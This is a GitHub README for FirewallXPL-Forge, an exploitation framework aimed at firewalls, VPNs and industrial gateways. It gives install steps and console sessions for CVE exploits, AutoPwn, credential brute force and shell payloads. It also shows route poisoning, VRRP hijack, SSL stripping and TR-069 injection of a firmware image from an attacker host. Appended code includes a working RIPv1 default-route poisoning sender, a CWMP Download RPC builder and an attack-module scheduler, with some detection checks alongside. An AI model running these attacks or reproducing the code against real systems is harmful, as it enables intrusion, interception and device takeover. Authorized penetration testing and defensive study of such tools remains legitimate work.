mrhenrike/FirewallXPL-Forge

GitHub: mrhenrike/FirewallXPL-Forge

FirewallXPL-Forge is a penetration-testing exploitation framework for perimeter security appliances (firewalls, WAFs, VPNs, OT/ICS). It ships 164 modules covering 51+ CVEs across 23 vendors.

Stars: 5 | Forks: 0

# FirewallXPL-Forge

**Perimeter security exploitation framework**: 164 modules covering **FW, NGFW, UTM, WAF, VPN, NAC, LB** and **OT/ICS** industrial firewalls from **23 vendors** and **51+ CVEs**.

**Author:** André Henrique ([@mrhenrike](https://github.com/mrhenrike)) \| [União Geek](https://github.com/Uniao-Geek)

**Language:** **English (en-US)**, the default. **Portuguese (pt-BR):** [README.pt-BR.md](README.pt-BR.md)

[![Python 3.9–3.13](https://img.shields.io/badge/Python-3.9--3.13-blue.svg)](https://www.python.org/downloads/) [![CI](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/ce303c9f65205137.svg)](https://github.com/mrhenrike/FirewallXPL-Forge/actions) [![PyPI](https://img.shields.io/pypi/v/firewallxpl.svg)](https://pypi.org/project/firewallxpl/)

## Architecture and Attack Surface Map

![FirewallXPL-Forge v2.0.0: full attack surface map with coverage status](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/c4e7f90914205139.png)

## Installation

```
# From PyPI (recommended)
pip install firewallxpl

# With Rich TUI + Nmap discovery
pip install firewallxpl[tui,discovery]

# With ML engine + GPU acceleration
pip install firewallxpl[ml,gpu-nvidia]

# Everything
pip install firewallxpl[full]

# From source
git clone https://github.com/mrhenrike/FirewallXPL-Forge.git
cd FirewallXPL-Forge
pip install -e ".[tui,discovery]"
python fxf.py
```

### Environment diagnostics

```
python tools/env_doctor.py
```

## What the Project Provides

FirewallXPL-Forge provides **modules** for **authorized** security testing of perimeter devices (penetration tests, labs, controlled red-team engagements). Target categories: `perimeter`, `waf`, `vpn`, `nac`, `lb`.

| Type | Purpose |
|------|---------|
| **exploits** | Abuse known vulnerabilities; every module implements `check()` + `run()` |
| **creds** | Default credentials and brute force against SSH, FTP, Telnet, HTTP, SNMP |
| **scanners** | Weakness identification; **AutoPwn** orchestrates all modules with Nmap-style timing templates (T0–T5) |
| **payloads** | Payload generation per architecture (ARM/MIPS/x86/x64; reverse/bind shell) |
| **encoders** | Payload encoding (Python, PHP, Perl) |
| **generic** | Cross-cutting utilities: CVE lookup, SNMP, SSDP, wordlist generator |

**Out of scope:** IP cameras, printers, DVRs, consumer routers.

## Vendor Coverage (23 vendors, 51+ CVEs)

### IT Security Appliances

| Vendor | Modules | Key CVEs |
|--------|---------|----------|
| Fortinet FortiOS/FortiGate | 9 | CVE-2018-13379, CVE-2022-40684, CVE-2024-21762, CVE-2024-47575 |
| Cisco ASA/FTD/IOS XE | 4 | CVE-2020-3452, CVE-2023-20198, CVE-2023-20269 |
| Palo Alto PAN-OS | 6 | **CVE-2026-0257** (auth bypass, CISA KEV 2026-05-29), CVE-2024-0012, CVE-2024-3400, CVE-2025-0108 |
| F5 BIG-IP | 6 | CVE-2020-5902, CVE-2022-1388, CVE-2023-46747 |
| Citrix/NetScaler | 3 | CVE-2019-19781, CVE-2023-3519, CVE-2023-4966 |
| SonicWall | 6 | CVE-2020-5135, CVE-2024-40766, CVE-2024-53704 |
| Ivanti/Pulse Secure | 3 | CVE-2019-11510, CVE-2023-46805+21887, CVE-2025-0282 |
| Juniper SRX/EX | 2 | CVE-2023-36845, CVE-2024-21591 |
| Sophos XG | 3 | CVE-2020-12271, CVE-2022-1040, CVE-2022-3236 |
| Check Point | 1 | CVE-2024-24919 |
| WatchGuard | 2 | XCS RCE, CVE-2022-23176 |
| Zyxel USG | 3 | CVE-2022-30525, CVE-2023-28771, CVE-2023-33009 |
| pfSense | 3 | CVE-2022-31814, CVE-2023-27100, CVE-2023-42326 |
| Barracuda | 3 | CVE-2023-2868, CVE-2023-7102, SecureSphere SQLi |

### OT/ICS Industrial Firewalls

| Vendor | Modules | Key CVEs |
|--------|---------|----------|
| Siemens SCALANCE/SINEMA/RUGGEDCOM | 3 | CVE-2022-32257, CVE-2023-24845, CVE-2023-44373 |
| Moxa EDR | 2 | CVE-2024-9137 (CVSS 9.9), CVE-2024-9138 |
| Hirschmann EAGLE | 1 | CVE-2020-6994 |
| Phoenix Contact mGuard | 1 | CVE-2024-43386 |
| Schneider ConneXium/Tofino | 1 | CVE-2017-6026 |
| Cisco ISA-3000 | 1 | CVE-2018-0101 (CVSS 10.0) |
| Secomea GateManager | 1 | CVE-2020-14500 (CVSS 10.0) |
| Ewon/HMS Cosy+ | 1 | CVE-2026-25823 |

### OT Protocol Bypass

Modbus TCP, OPC UA, DNP3, IEC 60870-5-104, EtherNet/IP CIP

### Generic Techniques

HTTP Request Smuggling, VLAN Hopping, Heartbleed, Shellshock, SSH Auth Keys

## Usage

### Interactive shell

```
python fxf.py
```

```
fxf > use exploits/perimeter/fortinet/fortios_sslvpn_path_traversal_cve_2018_13379
fxf (...) > set target 192.168.1.1
fxf (...) > check
[+] Target is vulnerable
fxf (...) > run
```

### AutoPwn with ML

```
fxf > use scanners/autopwn
fxf (scanners/autopwn) > set target 192.168.1.1
fxf (scanners/autopwn) > set timing_template aggressive
fxf (scanners/autopwn) > set ml_advisor true
fxf (scanners/autopwn) > set ml_fingerprint true
fxf (scanners/autopwn) > run
```

### Non-interactive mode

```
python fxf.py -m exploits/perimeter/fortinet/fortios_auth_bypass_cve_2022_40684 -s "target 10.0.0.1"
```

### Search

```
fxf > search fortinet
fxf > search type=exploits vendor=cisco
fxf > search CVE-2024
fxf > search cve_2026_0257
```

### NSE script installer

Installs the bundled firewall-specific Nmap scripts into your nmap scripts directory:

```
# Interactive
fxf > install-nse

# Non-interactive (requires nmap in PATH)
python fxf.py -c "install-nse"

# Custom path or dry run
python fxf.py -c "install-nse --path /usr/local/share/nmap/scripts"
python fxf.py -c "install-nse --check"
```

**Bundled scripts:**

| Script | Purpose |
|--------|---------|
| `fxf-firewall-fingerprint.nse` | Generic firewall fingerprinting (11 vendors) |
| `fxf-globalprotect-detect.nse` | Palo Alto GlobalProtect portal/gateway detection |
| `fxf-globalprotect-auth-bypass-cve-2026-0257.nse` | Passive pre-check for CVE-2026-0257 |
| `fxf-fortios-detect.nse` | Fortinet FortiOS detection |
| `fxf-cisco-asa-detect.nse` | Cisco ASA/FTD detection |

```
# After installation: use nmap directly
nmap -p 443 --script fxf-globalprotect-auth-bypass-cve-2026-0257 <target>
nmap -p 443,80,8443 --script fxf-firewall-fingerprint 192.168.0.0/24
```

For the full NSE reference, see [docs/wiki/en-US/12-nse-scripts.md](docs/wiki/en-US/12-nse-scripts.md).

## Core Engines

| Engine | Description |
|--------|-------------|
| **Async concurrency** | asyncio + ThreadPool (up to 300 threads) + ProcessPool + ConnectionPool + Pipeline |
| **GPU acceleration** | NVIDIA CUDA, AMD ROCm, Intel oneAPI, Apple Metal, OpenCL, with CPU fallback |
| **ML engine** | ServiceFingerprinter, AttackOptimizer (Thompson Sampling), AnomalyDetector, AutoTuner, CredentialMutator |
| **Network discovery** | Nmap/Masscan integration + built-in TCP fallback + device identification (23 vendors) + vulnerability mapping |
| **Rich TUI** | Styled banner, panels, tables, progress bars, full-screen dashboard |

## Compatibility

| Platform | Status |
|----------|--------|
| Windows 10/11 | CI + locally verified |
| WSL / Debian / Ubuntu | CI + locally verified |
| Kali Linux | Locally verified |
| macOS | CI |

**Python:** 3.9 through 3.13. Includes a compatibility shim for `telnetlib`, which was removed from the standard library in Python 3.13.

## Documentation

- **Wiki (en-US + pt-BR):** [github.com/mrhenrike/FirewallXPL-Forge/wiki](https://github.com/mrhenrike/FirewallXPL-Forge/wiki)
- **Coverage matrix:** [docs/COVERAGE_MATRIX.md](docs/COVERAGE_MATRIX.md)
- **Full catalog:** [docs/FULL_CATALOG.md](docs/FULL_CATALOG.md)

## BLOCO J: Attack Categories (v2.0.0)

### Routing attacks

```
fxf > use exploits/routing/rip_v1_poison
fxf (RIPv1Poison) > set src_ip 192.168.1.100
fxf (RIPv1Poison) > set poison_network 0.0.0.0
fxf (RIPv1Poison) > set metric 1
fxf (RIPv1Poison) > set destination 255.255.255.255
fxf (RIPv1Poison) > set simulate true
fxf (RIPv1Poison) > run
[SIMULATE] Would send RIPv1 Response to 255.255.255.255:520
[SIMULATE] Network: 0.0.0.0 (default route) metric=1 next-hop=192.168.1.100
[SIMULATE] Payload (24 bytes): 0201000000020000...
[SIMULATE] Exploits CVE-1999-0111: RIPv1 has no authentication
[SIMULATE] Effect: routers accepting unauthenticated RIPv1 install default route via attacker
[!] Set simulate false + destructive true to execute
```

```
fxf > use exploits/routing/vrrp_hijack
fxf (VRRPHijack) > set src_ip 192.168.1.100
fxf (VRRPHijack) > set vrid 1
fxf (VRRPHijack) > set virtual_ip 192.168.1.1
fxf (VRRPHijack) > set priority 255
fxf (VRRPHijack) > set simulate true
fxf (VRRPHijack) > run
[SIMULATE] Would send 5 VRRP Advertisement(s)
[SIMULATE] VRID=1 priority=255 virtual_ip=192.168.1.1 advert_int=1s
[SIMULATE] src=192.168.1.100 -> dst=224.0.0.18 (IP proto 112)
[SIMULATE] VRRP payload (16 bytes): 21012001...
[SIMULATE] Effect: current VRRP master yields; attacker becomes active router for 192.168.1.1
[!] PREREQ: Scapy + raw socket privileges (Linux root) or Windows admin
```

| Module | Path | Impact | References |
|--------|------|--------|------------|
| `rip_v1_poison` | `exploits/routing/` | HIGH | CVE-1999-0111, RFC 1058 |
| `vrrp_hijack` | `exploits/routing/` | HIGH | RFC 3768, MITRE T1557 |

### MiTM proxies

```
fxf > use exploits/mitm/tr069_mitm_proxy
fxf (TR069MiTM) > set acs_host 10.0.0.1
fxf (TR069MiTM) > set acs_port 7547
fxf (TR069MiTM) > set listen_port 7547
fxf (TR069MiTM) > set inject_mode firmware
fxf (TR069MiTM) > set firmware_url http://attacker/malicious.bin
fxf (TR069MiTM) > set simulate true
fxf (TR069MiTM) > run
[SIMULATE] Would bind CWMP proxy on 0.0.0.0:7547
[SIMULATE] Upstream ACS: 10.0.0.1:7547 (ssl=False)
[SIMULATE] Injection mode: inject Download RPC pointing to http://attacker/malicious.bin
[SIMULATE] Setup required:
[SIMULATE]   1. ARP poison CPE to redirect port 7547 to attacker
[SIMULATE]   2. iptables -t nat -A PREROUTING -p tcp --dport 7547 -j REDIRECT --to-port 7547
[!] Set simulate false + destructive true to start proxy
```

```
fxf > use exploits/mitm/ssl_strip_embedded
fxf (SSLStrip) > set target 192.168.1.1
fxf (SSLStrip) > set target_port 443
fxf (SSLStrip) > set listen_port 10080
fxf (SSLStrip) > set simulate true
fxf (SSLStrip) > run
[SIMULATE] Would bind SSL strip proxy on 0.0.0.0:10080
[SIMULATE] Upstream target: 192.168.1.1:443 (use_ssl_upstream=True)
[SIMULATE] All HTTPS references stripped to HTTP in responses
[SIMULATE] Credentials, cookies, and auth headers logged in plaintext
[SIMULATE] Setup required:
[SIMULATE]   1. ARP poison target: arp -s
[SIMULATE]   2. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10080
[!] Set simulate false + destructive true to start proxy
```

| Module | Path | Impact | References |
|--------|------|--------|------------|
| `tr069_mitm_proxy` | `exploits/mitm/` | CRITICAL | TR-069 Amendment 6, CVE-2014-9222 |
| `ssl_strip_embedded` | `exploits/mitm/` | HIGH | BlackHat DC 2009 (Marlinspike), MITRE T1557.002 |

### Coverage summary

| Category | Modules | Default mode |
|----------|---------|--------------|
| Routing attacks | `rip_v1_poison`, `vrrp_hijack` | simulate=True |
| MiTM proxies | `tr069_mitm_proxy`, `ssl_strip_embedded` | simulate=True |
| Perimeter exploits | `fortios_sslvpn_session_reuse`, `cisco_asa_ftd_firestarter_chain`, and 10+ more | simulate=True |
| Credentials | `perimeter_auth_bruteforce` | simulate=True |

All modules default to `simulate=True`. Real execution requires setting `simulate false` and `destructive true` explicitly, after reviewing the simulated output.

## Governance

| English (default) | Portuguese (pt-BR) |
|-------------------|--------------------|
| [CONTRIBUTING.md](CONTRIBUTING.md) | [CONTRIBUTING.pt-BR.md](CONTRIBUTING.pt-BR.md) |
| [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md) | [CODE_OF_CONDUCT.pt-BR.md](CODE_OF_CONDUCT.pt-BR.md) |
| [SECURITY.md](SECURITY.md) | [SECURITY.pt-BR.md](SECURITY.pt-BR.md) |
| [CONTRIBUTORS.md](CONTRIBUTORS.md) | [CONTRIBUTORS.pt-BR.md](CONTRIBUTORS.pt-BR.md) |

## License

BSD; see [LICENSE](LICENSE).
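The module table above says every exploit module implements `check()` + `run()`, and the BLOCO J section shows `rip_v1_poison` refusing to transmit until both `simulate false` and `destructive true` are set. The block below is an added worked example written for this page; it is not FirewallXPL-Forge code and does not use its API. It is a hypothetical module in the same shape, built on the RIPv1 Response format of RFC 1058 section 3.1 (4-byte header plus 20-byte entries, UDP/520, no authentication field, next hop taken from the datagram's source IP). Option names copy the README's session; `RipV1PoisonModule`, `build_rip_v1_response`, `parse_rip_v1_response` and `flags_default_route_injection` are invented names. A default-route entry with metric 1 reproduces the 24-byte payload whose prefix `0201000000020000` appears in the simulate output.

```python
"""Added example, not FirewallXPL-Forge code: a hypothetical FXF-style routing
module (options, check(), run(), simulate=True by default, destructive=True
required to transmit) around the RIPv1 Response format of RFC 1058 s.3.1.
All class and function names here are invented for illustration."""
import ipaddress
import socket
import struct

RIP_PORT = 520           # RIP speaks UDP/520 (RFC 1058)
RIP_CMD_RESPONSE = 2     # command 2 = Response; unsolicited updates use it too
RIP_VERSION_1 = 1
AFI_INET = 2             # address family identifier for IPv4
RIP_INFINITY = 16        # metric 16 means unreachable
ENTRY_FMT = "!HH4sIII"   # AFI, zero, IPv4, zero, zero, metric = 20 bytes


def build_rip_v1_response(entries):
    """Serialise a RIPv1 Response from an iterable of (network, metric).

    RIPv1 carries no authentication field (RIPv2 later reserved AFI 0xFFFF
    for one), so nothing in the packet proves who sent it. RIPv1 also has no
    next-hop field: a receiver installs the datagram's source IP as next hop,
    which is why the attacker's src_ip is the whole story.
    """
    pkt = struct.pack("!BBH", RIP_CMD_RESPONSE, RIP_VERSION_1, 0)
    for network, metric in entries:
        if not 1 <= int(metric) <= RIP_INFINITY:
            raise ValueError(f"metric {metric} outside 1..{RIP_INFINITY}")
        addr = ipaddress.IPv4Address(network).packed
        pkt += struct.pack(ENTRY_FMT, AFI_INET, 0, addr, 0, 0, int(metric))
    return pkt


def parse_rip_v1_response(pkt):
    """Decode a RIPv1 packet into (command, [(network, metric), ...])."""
    if len(pkt) < 4 or (len(pkt) - 4) % 20:
        raise ValueError("bad RIP length")
    cmd, ver, zero = struct.unpack_from("!BBH", pkt, 0)
    if ver != RIP_VERSION_1 or zero != 0:
        raise ValueError("not a RIPv1 packet")
    entries = []
    for off in range(4, len(pkt), 20):
        afi, _, addr, _, _, metric = struct.unpack_from(ENTRY_FMT, pkt, off)
        if afi != AFI_INET:
            raise ValueError(f"unexpected AFI {afi}")
        entries.append((str(ipaddress.IPv4Address(addr)), metric))
    return cmd, entries


def flags_default_route_injection(src_ip, pkt, trusted_routers):
    """Defender-side check: a Response from a host that is not a known router
    and that advertises 0.0.0.0 is exactly the poisoning described above."""
    cmd, entries = parse_rip_v1_response(pkt)
    if cmd != RIP_CMD_RESPONSE or src_ip in trusted_routers:
        return False
    return any(net == "0.0.0.0" for net, _ in entries)


class RipV1PoisonModule:
    """Hypothetical module: safe by default, two flags needed to transmit."""

    def __init__(self, **opts):
        self.opts = {"src_ip": None, "poison_network": "0.0.0.0", "metric": 1,
                     "destination": "255.255.255.255",
                     "simulate": True, "destructive": False}
        self.opts.update(opts)

    def check(self):
        """RIPv1 offers nothing to probe without sending, so check() only
        validates options; a lab check would instead sniff for RIP traffic."""
        for key in ("src_ip", "poison_network", "destination"):
            ipaddress.IPv4Address(self.opts[key])  # raises on junk input
        return 1 <= int(self.opts["metric"]) <= RIP_INFINITY

    def run(self):
        pkt = build_rip_v1_response(
            [(self.opts["poison_network"], self.opts["metric"])])
        result = {"dst": f"{self.opts['destination']}:{RIP_PORT}",
                  "bytes": len(pkt), "hex": pkt.hex(), "sent": False}
        if self.opts["simulate"] or not self.opts["destructive"]:
            return result  # describe the packet, never touch the wire
        # Destructive path: binding UDP/520 needs root; broadcast needs SO_BROADCAST.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            sock.bind((self.opts["src_ip"], RIP_PORT))
            sock.sendto(pkt, (self.opts["destination"], RIP_PORT))
        result["sent"] = True
        return result
```

Note the gate: `destructive=True` alone does nothing while `simulate` is still `True`, which matches the two-flag instruction the README's simulate output prints. The parser and `flags_default_route_injection` are the mirror image a blue team would run over captured UDP/520 traffic: RIPv1 cannot be authenticated, so the only defensible policy is to disable it or to alert on any Response from a source that is not a known router.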
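The `tr069_mitm_proxy` session above describes injecting a CWMP `Download` RPC that points the CPE at `http://attacker/malicious.bin`, which is only possible because the ACS connection runs in the clear (`ssl=False`). The block below is an added example for this page, not FirewallXPL-Forge code, showing both sides of that exchange: what the injected RPC looks like on the wire, using the TR-069 `Download` argument set (CommandKey, FileType, URL, Username, Password, FileSize, TargetFileName, DelaySeconds, SuccessURL, FailureURL) in the `urn:dslforum-org:cwmp-1-0` namespace, and a CPE- or sensor-side audit that rejects it. The function names, the trusted-host list and the sample URLs are constructed for the example.

```python
"""Added example, not FirewallXPL-Forge code: a TR-069/CWMP Download RPC as an
injecting proxy would emit it, plus the audit a CPE firmware-update path or a
passive sensor can apply before honouring it. Names here are invented."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
CWMP_NS = "urn:dslforum-org:cwmp-1-0"
ET.register_namespace("soap-env", SOAP_ENV)
ET.register_namespace("cwmp", CWMP_NS)

# TR-069 Download arguments, in schema order; FileType "1 ..." is a firmware image.
DOWNLOAD_ARGS = ("CommandKey", "FileType", "URL", "Username", "Password",
                 "FileSize", "TargetFileName", "DelaySeconds", "SuccessURL",
                 "FailureURL")


def build_download_rpc(url, command_key="demo", file_type="1 Firmware Upgrade Image",
                       request_id="1"):
    """Serialise the SOAP envelope an ACS, or a proxy impersonating one, sends.

    This is the message the MiTM proxy described above splices into the
    ACS-to-CPE stream; on a plaintext CWMP session nothing stops it.
    """
    values = dict(zip(DOWNLOAD_ARGS, (command_key, file_type, url, "", "", "0",
                                      "", "0", "", "")))
    env = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    header = ET.SubElement(env, f"{{{SOAP_ENV}}}Header")
    rid = ET.SubElement(header, f"{{{CWMP_NS}}}ID")
    rid.set(f"{{{SOAP_ENV}}}mustUnderstand", "1")
    rid.text = request_id
    body = ET.SubElement(env, f"{{{SOAP_ENV}}}Body")
    download = ET.SubElement(body, f"{{{CWMP_NS}}}Download")
    for tag in DOWNLOAD_ARGS:                  # RPC arguments are unqualified
        ET.SubElement(download, tag).text = values[tag]
    return ET.tostring(env, encoding="unicode")


def audit_download_rpc(xml_text, trusted_hosts, require_tls=True):
    """Inspect a CWMP envelope; returns the RPC name, URL, FileType and findings.

    An empty findings list means the Download is acceptable under the policy:
    TLS only, and only from hosts the operator has pinned as ACS/file servers.
    """
    root = ET.fromstring(xml_text)
    body = root.find(f"{{{SOAP_ENV}}}Body")
    rpc = body[0] if body is not None and len(body) else None
    name = rpc.tag.split("}")[-1] if rpc is not None else None
    report = {"rpc": name, "url": None, "file_type": None, "findings": []}
    if name != "Download":
        return report                          # nothing to audit in other RPCs
    url = (rpc.findtext("URL") or "").strip()
    parsed = urlparse(url)
    report["url"] = url
    report["file_type"] = (rpc.findtext("FileType") or "").strip()
    if not url:
        report["findings"].append("empty URL")
    if require_tls and parsed.scheme != "https":
        report["findings"].append(f"non-TLS scheme {parsed.scheme!r}")
    if parsed.hostname not in trusted_hosts:
        report["findings"].append(f"untrusted host {parsed.hostname!r}")
    return report
```

The audit is deliberately an allow-list on the URL's host plus a TLS requirement, because a Download RPC is a remote firmware replacement: a CPE that honours it from any host named in a plaintext SOAP body is already lost, and the only durable fix is CWMP over TLS with ACS certificate validation, which makes the ARP-spoof-and-redirect setup in the simulate output fail at the handshake.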
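The Core Engines table lists an `AttackOptimizer` based on Thompson Sampling, which AutoPwn uses when `ml_advisor` is enabled. The block below is an added example for this page illustrating that algorithm in general, not the project's implementation: a Beta-Bernoulli bandit that keeps a success/failure count per module, samples a plausible success rate for each, and tries the module whose sample is highest, so effort shifts toward modules that are actually working against this target while still occasionally retrying the others. The module names and hidden success rates in `run_campaign` are constructed; the seeded `random.Random` makes the run repeatable.

```python
"""Added example, not FirewallXPL-Forge code: Beta-Bernoulli Thompson sampling
as a scheduler over candidate modules. Generic algorithm; names are invented."""
import random


class ThompsonModuleSelector:
    """Per-module Beta(1+successes, 1+failures) posterior over success rate."""

    def __init__(self, modules, seed=None):
        self.modules = list(modules)
        self.successes = {m: 0 for m in self.modules}
        self.failures = {m: 0 for m in self.modules}
        self._rng = random.Random(seed)

    def select(self):
        """Draw one success-rate sample per module; run the one with the highest draw.

        A module with few trials has a wide posterior, so it still wins some
        draws (exploration); a module that keeps failing collapses toward 0
        and is rarely chosen again (exploitation)."""
        draws = {m: self._rng.betavariate(1 + self.successes[m], 1 + self.failures[m])
                 for m in self.modules}
        return max(draws, key=draws.get)

    def update(self, module, success):
        """Feed back the outcome of one attempt (e.g. check() said vulnerable)."""
        if success:
            self.successes[module] += 1
        else:
            self.failures[module] += 1

    def pulls(self, module):
        return self.successes[module] + self.failures[module]

    def posterior_mean(self, module):
        """Point estimate of the module's success rate under the Beta posterior."""
        return (1 + self.successes[module]) / (2 + self.pulls(module))


def run_campaign(true_rates, rounds, seed=7):
    """Constructed environment: each module succeeds with a fixed hidden rate.

    true_rates maps module name -> probability; the selector never sees it
    and must discover the best module from outcomes alone."""
    env_rng = random.Random(seed)
    selector = ThompsonModuleSelector(true_rates, seed=seed)
    for _ in range(rounds):
        chosen = selector.select()
        selector.update(chosen, env_rng.random() < true_rates[chosen])
    return selector
```

In a perimeter engagement the payoff is budget, not only speed: against a rate-limited VPN portal every attempt that lands on a module fingerprinting says is the wrong vendor costs log noise and lockout risk, and a bandit of this shape is what lets an orchestrator stop spending those attempts without a hand-tuned rule per vendor.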